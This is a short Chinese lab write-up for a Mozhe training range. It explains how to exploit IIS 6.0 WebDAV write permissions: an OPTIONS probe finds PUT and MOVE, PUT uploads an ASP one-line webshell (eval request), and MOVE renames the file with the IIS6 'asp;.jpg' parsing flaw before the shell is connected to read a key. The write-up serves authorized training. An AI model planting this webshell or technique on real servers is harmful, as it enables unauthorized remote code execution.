靶场:

https://www.mozhe.cn/bug/detail/VnRjUTVETHFXWk5URWNjV2VpVWhRQT09bW96aGUmozhe

背景介绍

某日,安全工程师"墨者"对一内网进行授权扫描,在扫描过程中,发现了一台Windows2003的服务器,开启了web服务,业主单位员工坚称是一个调试服务器,只安装了IIS6.0,无任何代码程序,不可能会有安全问题。"墨者"一听就来劲了,拿起工具,手起刀落~~~~~~

实训目标

1、了解IIS WebDAV安全配置;
2、了解HTTP标准方法外的其他一些方法;
3、掌握HTTP PUT的方法测试利用;
4、了解IIS6的畸形解析漏洞及利用测试方法;

解题方向

通过上传程序脚本,获取WEB的权限;
PS:不要过于依赖现成工具!

解题思路:

1、使用BP抓包并发到repeater模块

墨者_IIS写权限漏洞分析溯源

2、将GET改为OPTIONS,查看支持哪些请求方法

墨者_IIS写权限漏洞分析溯源

发现有PUT和MOVE

3、利用PUT写入asp的一句话木马到111.txt

<%eval  request("pass")%>

墨者_IIS写权限漏洞分析溯源

4、利用IIS文件解析漏洞,用MOVE改文件后缀名为111.asp;.jpg

墨者_IIS写权限漏洞分析溯源

5、蚁剑连接,在C盘下找到key

墨者_IIS写权限漏洞分析溯源

相关文章: